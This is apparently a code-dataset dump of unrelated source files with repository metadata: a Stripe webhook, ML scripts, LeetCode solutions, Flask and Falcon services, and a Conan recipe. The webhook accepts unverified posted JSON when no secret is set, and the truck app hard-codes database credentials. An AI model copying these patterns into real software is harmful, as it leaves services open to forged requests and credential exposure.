            # NOTE(review): returning the exception object relies on Flask's
            # error handling; an explicit 400 response would be clearer.
            return e
        # Get the type of webhook event sent - used to check the status of PaymentIntents.
        event_type = event['type']
    else:
        # No secret configured: trust the posted JSON as-is (dev mode only).
        data = request_data['data']
        event_type = request_data['type']
    data_object = data['object']

    print('event ' + event_type)

    if event_type == 'checkout.session.completed':
        print('Payment succeeded!')

    return jsonify({'status': 'success'})
if __name__ == '__main__':
    # Development server; Stripe samples conventionally listen on 4242.
    app.run(port=4242)
| 34.617978 | 182 | 0.636644 | 0 | 0 | 0 | 0 | 5,028 | 0.815969 | 0 | 0 | 2,595 | 0.42113 |
17bc3e483fd3d3f977cf7a9dcbaef4c2331e4edd | 3,992 | py | Python | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 10 | 2020-06-21T04:30:05.000Z | 2022-01-10T01:24:58.000Z | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 4 | 2020-06-30T03:47:23.000Z | 2021-07-12T19:33:52.000Z | src/synthesize_predictions.py | bluetyson/concept-tagging-training | 449388748155a8f2e398d24d750e5d3871f8e75d | [
"MIT"
] | 8 | 2020-06-19T13:24:47.000Z | 2021-09-13T02:09:21.000Z | import argparse
import logging
from pathlib import Path
import dask
import h5py
import joblib
import numpy as np
import pandas as pd
from dask.diagnostics import ProgressBar
from tqdm import tqdm
from dsconcept.get_metrics import (
get_cat_inds,
get_synth_preds,
load_category_models,
load_concept_models,
HierarchicalClassifier,
get_mets,
)
# Module-level logger at INFO so pipeline progress messages are visible.
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
def main(
    experiment_name,
    synth_strat,
    in_cat_preds,
    out_store,
    synth_batch_size,
    t,
    out_synth_scores,
    limit=None,
    con_limit=None,
):
    """Synthesize concept predictions for an experiment's test split and score them.

    Parameters:
        experiment_name: experiment directory name under data/interim and models/.
        synth_strat: synthesis strategy passed to get_synth_preds.
        in_cat_preds: path to the .npy file of category predictions.
        out_store: HDF5 store holding 'ground_truth' and receiving 'synthesis'.
        synth_batch_size: batch size used during synthesis.
        t: category-probability threshold for get_cat_inds.
        out_synth_scores: CSV path for the per-concept metric records.
        limit: optional cap on the number of test records.
        con_limit: optional cap on the number of concept classifiers.
    """
    # Load the test split, features, and the hierarchical classifier parts.
    test_inds = np.load(f"data/interim/{experiment_name}/test_inds.npy")
    feature_matrix = joblib.load(f"data/interim/{experiment_name}/feature_matrix.jbl")
    in_cat_models = Path(f"models/{experiment_name}/categories/models/")
    in_kwd_models = Path(f"models/{experiment_name}/keywords/models/")
    cat_preds = np.load(in_cat_preds)  # based on experiment or explicit path?
    cat_clfs = load_category_models(in_cat_models)
    cd = load_concept_models(in_kwd_models)
    clf = HierarchicalClassifier(cat_clfs, cd)

    if limit is not None:
        LOG.info(f"Limiting to {limit} test records.")
        feature_matrix_test = feature_matrix.tocsc()[test_inds[0:limit], :]
        cat_preds = cat_preds[0:limit, :]
        # TODO: How does this affect indices?
    else:
        feature_matrix_test = feature_matrix.tocsc()[test_inds, :]

    LOG.info(f'Synthesizing predictions with strategy "{synth_strat}".')
    # Indices of categories whose predicted probability exceeds threshold t.
    all_cat_inds = get_cat_inds(clf.categories, cat_preds, t=t)
    if con_limit is not None:
        conwc = clf.concepts_with_classifiers[0:con_limit]
    else:
        conwc = clf.concepts_with_classifiers
    shape = (feature_matrix_test.shape[0], len(conwc))
    with tqdm(total=shape[0]) as pbar:
        # Writes the 'synthesis' dataset into out_store in batches.
        get_synth_preds(
            out_store,
            shape,
            all_cat_inds,
            clf.categories,
            synth_batch_size,
            only_cat=False,
            synth_strat=synth_strat,
            con_limit=con_limit,
            limit=limit,
            pbar=pbar,
        )

    LOG.info("Obtaining metrics.")
    with h5py.File(out_store, "r") as f0:
        if limit is not None:
            target_values = f0["ground_truth"][0:limit, :]
        else:
            target_values = f0["ground_truth"].value
    with h5py.File(out_store, "r") as f0:
        synth_preds = f0["synthesis"].value
    # Score each concept in parallel with dask delayed tasks.
    jobs = []
    mets_pbar = tqdm(
        range(len(conwc)),
        total=len(conwc),
    )
    for i in mets_pbar:
        job = dask.delayed(get_mets)(
            i, synth_preds, target_values, conwc, mets_pbar
        )
        jobs.append(job)
    records = dask.compute(jobs)
    new_recs_df = pd.DataFrame(records[0])
    LOG.info(f"Saving results to {out_synth_scores}.")
    new_recs_df.to_csv(out_synth_scores)
if __name__ == "__main__":
    # Command-line entry point: parse arguments and run the pipeline.
    parser = argparse.ArgumentParser(description="Say hello")
    parser.add_argument("--experiment_name", help="input txt file")
    parser.add_argument("--synth_strat", help="input txt file")
    parser.add_argument("--in_cat_preds", help="input txt file")
    parser.add_argument("--store", help="input txt file")
    parser.add_argument("--synth_batch_size", help="input txt file", type=int)
    parser.add_argument("--threshold", help="input txt file", type=float)
    parser.add_argument("--out_synth_scores", help="input txt file")
    parser.add_argument(
        "--limit", help="size for sample to test synthesis", type=int, default=None
    )
    parser.add_argument(
        "--con_limit", help="size for concept sample", type=int, default=None
    )
    args = parser.parse_args()
    main(
        args.experiment_name,
        args.synth_strat,
        args.in_cat_preds,
        args.store,
        args.synth_batch_size,
        args.threshold,
        args.out_synth_scores,
        args.limit,
        args.con_limit,
    )
| 31.1875 | 86 | 0.661072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 791 | 0.198146 |
17c11d2e03854c10df90cd4aba0694838e082d86 | 1,359 | py | Python | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | LeetCode/python/211-240/216-cobination-sum-iii/solution.py | shootsoft/practice | 49f28c2e0240de61d00e4e0291b3c5edd930e345 | [
"Apache-2.0"
] | null | null | null | class Solution:
# @param {integer} k
# @param {integer} n
# @return {integer[][]}
def combinationSum3(self, k, n):
nums = range(1, 10)
self.results = []
self.combination(nums, n, k, 0, [])
return self.results
def combination(self, nums, target, k, start, result):
if k <= 0 :
return
elif k == 1:
for i in nums:
if i == target:
self.results.append([i])
elif k == 2:
end = len(nums) - 1
while start < end:
s = nums[start] + nums[end]
if s == target:
result.append(nums[start])
result.append(nums[end])
self.results.append(result[:])
result.pop()
result.pop()
start += 1
elif s < target:
start += 1
else:
#s > target
end -= 1
else:
for i in range(start, len(nums)-1):
t = target - nums[i]
if t >= nums[i+1]:
result.append(nums[i])
self.combination(nums, t, k -1, i + 1, result )
result.pop()
else:
break | 28.3125 | 67 | 0.382634 | 1,359 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.054452 |
17c267cdf68b5d5312402448c8870bbe5e04350c | 3,543 | py | Python | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | service/resources/appointment_offer.py | SFDigitalServices/otc_appointments | 62627deafa123e0bc0df367441f3c202c3176b3e | [
"MIT"
] | null | null | null | """Email module"""
#pylint: disable=too-few-public-methods
import json
import os
import falcon
import requests
from mako.template import Template
import sendgrid
from sendgrid.helpers.mail import Email, To, Content, Mail
from .hooks import validate_access
# Sender identity and subject used for all offer e-mails.
FROM_EMAIL = "no-reply@sf.gov"
SUBJECT = "Appointment Offering"
# Spreadsheets microservice connection settings (injected via environment).
SPREADSHEETS_MICROSERVICE_URL = os.environ.get("SPREADSHEETS_MICROSERVICE_URL")
SPREADSHEETS_MICROSERVICE_API_KEY = os.environ.get("SPREADSHEETS_MICROSERVICE_API_KEY")
SPREADSHEET_KEY = os.environ.get("SPREADSHEET_KEY")
# Worksheet columns: appointment id in column A; the applicant's
# accept/decline response is written to column AL.
SPREADSHEETS_ID_COL = "A"
SPREADSHEETS_RESPONSE_COL = "AL"
SITE_DOMAIN = os.environ.get("SITE_DOMAIN")
SENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')
@falcon.before(validate_access)
class EmailOffer():
    """Falcon resource: e-mails an applicant an offer for a new appointment slot."""

    def on_post(self, _req, resp):
        #pylint: disable=no-self-use
        """
        Send an offer e-mail for a new appointment.

        Expects a JSON body with: to, id, name, newDate, newTime,
        oldDate, oldTime.  Renders the appointment_offer template and
        sends it via SendGrid; mirrors SendGrid's response body/status.
        """
        request_body = _req.bounded_stream.read()
        request_params_json = json.loads(request_body)

        template = Template(filename="templates/appointment_offer.html")

        sg = sendgrid.SendGridAPIClient(api_key=SENDGRID_API_KEY) #pylint: disable=invalid-name
        from_email = Email(FROM_EMAIL)
        to_email = To(request_params_json.get("to"))
        # Render the offer details into the HTML e-mail body.
        content = Content("text/html", template.render(
            site=SITE_DOMAIN,
            id=request_params_json.get('id'),
            name=request_params_json.get('name'),
            newDate=request_params_json.get('newDate'),
            newTime=request_params_json.get('newTime'),
            oldDate=request_params_json.get('oldDate'),
            oldTime=request_params_json.get('oldTime')
        ))
        mail = Mail(from_email, to_email, SUBJECT, content)
        response = sg.client.mail.send.post(request_body=mail.get())
        print(response.status_code)
        print(response.body)
        print(response.headers)

        resp.body = response.body
        resp.status_code = falcon.HTTP_200
class OfferResponse():
    """Record an applicant's response to an appointment offer."""

    def on_get(self, _req, resp):
        #pyint: disable=no-self-use
        """
        Write the applicant's response (query param ``action``) into the
        response column of the Google Sheet row identified by ``id``,
        via the spreadsheets microservice, then render a confirmation page.
        """
        try:
            data = create_spreadsheets_json()
            data["label_value_map"] = {
                SPREADSHEETS_RESPONSE_COL: _req.params.get('action')
            }
            print(data)
            response = requests.patch(
                url='{0}/rows/{1}'.format(SPREADSHEETS_MICROSERVICE_URL, _req.params.get('id')),
                headers=get_request_headers(),
                json=data
            )
            response.raise_for_status()

            resp.content_type = falcon.MEDIA_HTML
            template = Template(filename='templates/email_response.html')
            resp.body = template.render()
            resp.status = falcon.HTTP_200
        except requests.HTTPError as err:
            # Propagate the microservice's status and JSON error body.
            print("HTTPError:")
            print("{0} {1}".format(err.response.status_code, err.response.text))
            resp.status = falcon.get_http_status(err.response.status_code)
            resp.body = json.dumps(err.response.json())
def get_request_headers():
    """
    Headers for requests to the spreadsheets microservice
    (API-key authentication only).
    """
    return {
        'x-apikey': SPREADSHEETS_MICROSERVICE_API_KEY
    }
def create_spreadsheets_json():
    """Build the base request payload for the spreadsheets microservice."""
    return {
        "spreadsheet_key": SPREADSHEET_KEY,
        "worksheet_title": "Sheet1",
        "id_column_label": SPREADSHEETS_ID_COL,
    }
17c5134f523338eb38c2be750ed00943cad1dc8d | 34 | py | Python | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | 1 | 2018-02-13T02:55:16.000Z | 2018-02-13T02:55:16.000Z | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | null | null | null | matfactor/__init__.py | Joshua-Chin/matfactor | 6730ca7ddb7844d9d50f7e5725f5ccdaae31721b | [
"Apache-2.0"
] | null | null | null | from ._factorize import factorize
| 17 | 33 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17c5738139be0ff3cd10e6b345ccee28c0202628 | 752 | py | Python | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | C++/1059-All-Paths-from-Source-Lead-to-Destination/soln-1.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | class Solution {
public:
bool leadsToDestination(int n, vector<vector<int>>& edges, int source, int destination) {
for(auto & edge : edges) {
int u = edge[0], v = edge[1];
graph[u].push_back(v);
}
vector<bool> visited(n, false);
return dfs(source, destination, visited);
}
private:
bool dfs(int node, int target, vector<bool> & visited) {
if (graph.find(node) == graph.end()) return node == target;
visited[node] = true;
for (int nei : graph[node]) {
if (visited[nei] || !dfs(nei, target, visited))
return false;
}
visited[node] = false;
return true;
}
unordered_map<int, vector<int>> graph;
};
| 30.08 | 93 | 0.542553 | 230 | 0.305851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17c67804477d49c14190bfb741a72b7035d9286c | 767 | py | Python | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 33 | 2015-01-30T18:02:10.000Z | 2020-06-11T18:45:08.000Z | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 4 | 2015-01-29T21:00:22.000Z | 2021-06-10T17:40:08.000Z | docs/source/renderers/chart_renderer_example.py | steveblamey/django-report-tools | e12fe737a372925c7ce4969ed6e754d51cd9853b | [
"BSD-2-Clause"
] | 14 | 2015-04-13T10:34:35.000Z | 2020-08-16T18:02:04.000Z | from report_tools.renderers import ChartRenderer
class MyChartRenderer(ChartRenderer):
    """Chart renderer that emits simple HTML placeholder divs."""

    @classmethod
    def render_piechart(cls, chart_id, options, data, renderer_options):
        return cls._placeholder(chart_id, 'Pie Chart')

    @classmethod
    def render_columnchart(cls, chart_id, options, data, renderer_options):
        return cls._placeholder(chart_id, 'Column Chart')

    @classmethod
    def render_barchart(cls, chart_id, options, data, renderer_options):
        return cls._placeholder(chart_id, 'Bar Chart')

    @classmethod
    def render_linechart(cls, chart_id, options, data, renderer_options):
        return cls._placeholder(chart_id, 'Line Chart')

    @staticmethod
    def _placeholder(chart_id, label):
        # Same markup as before: a placeholder <div> carrying the chart id.
        return "<div id='%s' class='placeholder'>%s</div>" % (chart_id, label)
17c77bdbbbefa5f7c703943e14d06b6e268f555c | 2,849 | py | Python | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | app.py | lwalkk/truck-website | 81035dfa7ffdafdea162838dfaf82d0a44d2cf16 | [
"MIT"
] | null | null | null | from flask import Flask, request
from flask import render_template
from flask_mysqldb import MySQL
import TimeCalc
from datetime import datetime, timedelta
app = Flask(__name__)
# MySQL connection settings for the local "trucks" database.
# SECURITY(review): credentials are hard-coded; move them to environment
# variables / configuration before deploying.
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'password'
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_DB'] = 'trucks'
# Rows are returned as dicts so templates can access columns by name.
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
mysql = MySQL(app)
@app.route('/', methods=['GET', 'POST'])
def home():
    """Home page: trucks currently on site with estimated wait times."""
    cur = mysql.connection.cursor()
    cur.execute('''SELECT * FROM on_site''')
    onSite = cur.fetchall()
    # Recent throughput (last 12 hours) feeds the wait-time estimate.
    cur.execute('SELECT time_in, time_out FROM archive WHERE time_in >= DATE_ADD(NOW(), INTERVAL -12 HOUR);')
    prevTimes = cur.fetchall()
    wait_times = TimeCalc.CalculateWaitTime(prevTimes, onSite)
    i = 0
    for row in onSite:
        wait = wait_times[i]
        # Convert the expected-finish timestamp into hours from now.
        hours = (wait-datetime.now()).total_seconds() / 3600
        temp_dict = {'wait_time' :wait,'time_remaining': hours}
        row.update(temp_dict)
        i += 1
    return render_template('home.html', data=onSite, wait_times=wait_times, curr_time = datetime.now())
@app.route('/archive/', methods=['POST', 'GET'])
def archive():
    """Archive search page.

    GET renders an empty archive page.  POST filters the ``archive`` table by
    an optional date window and pickup location, then renders the rows when
    the requested output mode is 'screen'.
    """
    cur = mysql.connection.cursor()
    if request.method == 'POST':
        output = request.form['output']
        date = request.form['date']
        print('DATE IS ')
        print(date)

        query = 'SELECT * FROM archive '
        params = []
        andStr = ''
        whereStr = 'WHERE '

        # The date filters are fixed, server-side SQL fragments keyed off the
        # submitted option value, so they are safe to append verbatim.
        # (Pre-existing quirk preserved: an unrecognised non-'ALL' date adds
        # no filter but still flips andStr to 'AND '.)
        if date != 'ALL':
            if date == 'yesterday':
                query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -1 DAY) '
            elif date == 'lastWeek':
                query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -7 DAY) '
            elif date == 'last3Month':
                query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -90 DAY) '
            elif date == 'last6Month':
                query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -180 DAY) '
            elif date == 'lastYear':
                query += 'WHERE time_in >= DATE_ADD(NOW(), INTERVAL -365 DAY) '
            andStr = 'AND '
            whereStr = ''

        location = request.form['location']
        if location != 'ALL':
            # SECURITY FIX: the location value comes straight from the form and
            # was previously concatenated into the SQL string (SQL injection).
            # Bind it as a query parameter instead.
            query += andStr + whereStr + 'location=%s '
            params.append(location)
            andStr = 'AND '
            whereStr = ''

        query += ';'
        print(query)
        cur.execute(query, params)
        data = cur.fetchall()

        displayMode = request.form['output']
        if displayMode == 'screen':
            return render_template('archive.html', data=data)

    return render_template('archive.html', data=None)
| 27.133333 | 109 | 0.557389 | 0 | 0 | 0 | 0 | 2,445 | 0.858196 | 0 | 0 | 916 | 0.321516 |
17c9aa0e7487d9e67e8f56273b862ff651c5d62b | 233 | py | Python | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | test/test_children_tree.py | kisliakovsky/structures | 19969470a7e9b150b077082cc8ca0c2fc9be279e | [
"MIT"
] | null | null | null | from unittest import TestCase
from src.tree import ChildrenTree
class TestChildrenTree(TestCase):
def test_height(self):
tree = ChildrenTree(1, [[], [3, 4], [], [], [0, 2]])
self.assertEqual(3, tree.height())
| 21.181818 | 60 | 0.639485 | 165 | 0.708155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17cb214bdeac8ea001ea137df86d94fab66b5a09 | 5,183 | py | Python | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-gtk | bf8056df1294c0b6d894fddf71f8cf6531212aea | [
"MIT"
] | 1 | 2021-09-22T19:02:25.000Z | 2021-09-22T19:02:25.000Z | from conans import ConanFile, Meson, tools
from conans.errors import ConanInvalidConfiguration
import os
class LibnameConan(ConanFile):
name = "gtk"
description = "libraries used for creating graphical user interfaces for applications."
topics = ("conan", "gtk", "widgets")
url = "https://github.com/bincrafters/conan-gtk"
homepage = "https://www.gtk.org"
license = "LGPL-2.1-or-later"
generators = "pkg_config"
settings = "os", "arch", "compiler", "build_type"
options = {
"shared": [True, False],
"fPIC": [True, False],
"with_wayland": [True, False],
"with_x11": [True, False],
"with_pango": [True, False]
}
default_options = {
"shared": True,
"fPIC": True,
"with_wayland": False,
"with_x11": True,
"with_pango": True}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
if self.settings.os != "Linux":
del self.options.with_wayland
del self.options.with_x11
def build_requirements(self):
self.build_requires("meson/0.56.0")
if not tools.which('pkg-config'):
self.build_requires("pkgconf/1.7.3")
def requirements(self):
self.requires("gdk-pixbuf/2.42.0")
self.requires("glib/2.67.0")
self.requires("cairo/1.17.2")
self.requires("graphene/1.10.2")
if self.settings.os == "Linux":
self.requires("xkbcommon/1.0.3")
if self.options.with_wayland:
self.requires("wayland") # FIXME: Create an actual Wayland package(s)
if self.options.with_x11:
self.requires("xorg/system")
self.requires("libepoxy/1.5.4")
if self.options.with_pango:
self.requires("pango/1.48.0")
def system_requirements(self):
if self.settings.os == 'Linux' and tools.os_info.is_linux:
if tools.os_info.with_apt:
installer = tools.SystemPackageTool()
packages = ['sassc']
for package in packages:
installer.install(package)
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
if self.settings.os == "Linux":
if self.options.with_wayland or self.options.with_x11:
if not self.options.with_pango:
raise ConanInvalidConfiguration("with_pango option is mandatory when with_wayland or with_x11 is used")
if self.settings.os == "Windows":
raise ConanInvalidConfiguration("GTK recipe is not yet compatible with Windows. Contributions are welcome.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_meson(self):
meson = Meson(self)
defs = {}
if self.settings.os == "Linux":
defs["wayland-backend"] = "true" if self.options.with_wayland else "false"
defs["x11-backend"] = "true" if self.options.with_x11 else "false"
defs["introspection"] = "disabled"
defs["documentation"] = "false"
defs["man-pages"] = "false"
defs["build-tests"] = "false"
defs["build-examples"] = "false"
defs["demos"] = "false"
args=[]
args.append("--wrap-mode=nofallback")
meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)
return meson
def build(self):
with tools.environment_append(tools.RunEnvironment(self).vars):
meson = self._configure_meson()
meson.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
meson = self._configure_meson()
with tools.environment_append({
"PKG_CONFIG_PATH": self.install_folder,
"PATH": [os.path.join(self.package_folder, "bin")]}):
meson.install()
# If the CMakeLists.txt has a proper install method, the steps below may be redundant
# If so, you can just remove the lines below
include_folder = os.path.join(self._source_subfolder, "include")
self.copy(pattern="*", dst="include", src=include_folder)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so*", dst="lib", keep_path=False)
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append(os.path.join("include", "gtk-4.0"))
self.cpp_info.names["pkg_config"] = "gtk+-3.0"
if self.settings.os == "Macos":
self.cpp_info.frameworks = ["AppKit", "Carbon"]
| 40.492188 | 159 | 0.612001 | 5,075 | 0.979163 | 0 | 0 | 0 | 0 | 0 | 0 | 1,316 | 0.253907 |
17cb5a4e5e188e8afd6b4471951035dcebbec25c | 1,346 | py | Python | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | Testcase11-Real-world-app-emulation/trace-gen/src/generateActionIATMapping.py | sangroad/ServerlessBench | 5cddf6c7969319c2b02c608bc3866fd781d1417e | [
"MulanPSL-1.0"
] | null | null | null | # this file is for debug
import os
import yaml
SECONDS_OF_A_DAY = 3600*24
MILLISECONDS_PER_SEC = 1000
config = yaml.load(open(os.path.join(os.path.dirname(__file__),'config.yaml')), yaml.FullLoader)
SAMPLE_NUM = config['sample_number']
workloadDir = "../CSVs/%i" % SAMPLE_NUM
def generateActionIATMapping():
actionFileName = "%s/appComputeInfo.csv" % workloadDir
IATFileName = "%s/possibleIATs.csv" % workloadDir
appAndIATMapFileName = "%s/appandIATMap.csv" % workloadDir
actionIATdict = {}
actionFile = open(actionFileName, "r")
IATFile = open(IATFileName, "r")
outfile = open(appAndIATMapFileName, "w")
outfile.write("appName,IAT,execTime\n")
actionLines = actionFile.readlines()[1:]
IATLines = IATFile.readlines()[1:]
i = 0
appExecTime = 0
prev = ""
for line in actionLines:
splitted = line.split(",")
appName = splitted[0]
execTime = splitted[3]
appExecTime += int(execTime)
if appName == prev:
continue
# actionIATdict[appName] = float(IATLines[i][:-1])
outfile.write("%s,%s,%d\n" % (appName, IATLines[i][:-1], appExecTime))
i += 1
prev = appName
appExecTime = 0
actionFile.close()
IATFile.close()
return actionIATdict
if __name__ == '__main__':
generateActionIATMapping() | 28.638298 | 96 | 0.647845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 239 | 0.177563 |
17cb6e924dabd28d65570136329686d987bc7e4b | 1,047 | py | Python | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | 8 | 2018-10-17T18:17:25.000Z | 2022-03-18T09:02:53.000Z | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | null | null | null | electronics/ltspice/rc_lowpass/calc.py | qeedquan/misc_utilities | 94c6363388662ac8ebbf075b9c853ce6defbb5b3 | [
"MIT"
] | 3 | 2020-07-01T13:52:42.000Z | 2022-03-18T09:10:59.000Z | #!/usr/bin/env python
# http://sim.okawa-denshi.jp/en/CRtool.php
# A RC circuit can act as a low pass filter when fed different AC frequencies if we hook
# them up in a serial way
# We can calculate various values of the filters using the formulas below
from math import *
def cutoff_frequency(R, C):
return 1/(2*pi*R*C)
def risetime(R, C, t0, t1):
return R*C*log(t1/t0)
def print_risetimes():
R = 1e3
C = 1e-7
t = [
[0.1, 0.9],
]
for i in t:
print("R = %f C = %.8f t0 %f t1 %f risetime %f" % (R, C, i[0], i[1], risetime(R, C, i[0], i[1])))
def print_cutoff_frequencies():
R = 1e3
C = 1e-7
# there is one pole for an RC filter, which is negative of the cut off frequency
f = cutoff_frequency(R, C)
p = -f
print("R = %f C = %.8f Cutoff Frequency %f Pole %f" % (R, C, f, p))
# p = 1/RC
# p / (s + p)
def transfer_function(s, R, C):
p = 1 / (R*C)
print(p)
return p / (s + p)
print_risetimes()
print_cutoff_frequencies()
print(transfer_function(1+3j, 1e3, 1e-7))
| 24.348837 | 105 | 0.598854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.418338 |
17cbb18aa49b9a42e1ad5b10fe3c95f49bc72cb1 | 4,860 | py | Python | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | apps/log_search/tasks/mapping.py | kiritoscs/bk-log | 4801b14182ba7cb108d968cd4f33668ee2d16dbc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
We undertake not to change the open source license (MIT license) applicable to the current version of
the project delivered to anyone in the future.
"""
from concurrent.futures import ThreadPoolExecutor
from celery.schedules import crontab
from celery.task import periodic_task, task
from apps.log_search.handlers.search.search_handlers_esquery import SearchHandler
from apps.utils.lock import share_lock
from apps.utils.log import logger
from apps.exceptions import ApiResultError
from apps.log_search.constants import BkDataErrorCode
from apps.log_search.models import LogIndexSet
@periodic_task(run_every=crontab(minute="*/10"))
@share_lock()
def sync_index_set_mapping_cache():
logger.info("[sync_index_set_mapping_cache] start")
index_set_id_list = LogIndexSet.objects.filter(is_active=True).values_list("index_set_id", flat=True)
def sync_mapping_cache(index_set_id):
logger.info("[sync_index_set_mapping_cache] index_set({}) start".format(index_set_id))
try:
SearchHandler(index_set_id=index_set_id, search_dict={}).fields()
except Exception as e: # pylint: disable=broad-except
logger.exception("[sync_index_set_mapping_cache] index_set({}) sync failed: {}".format(index_set_id, e))
return
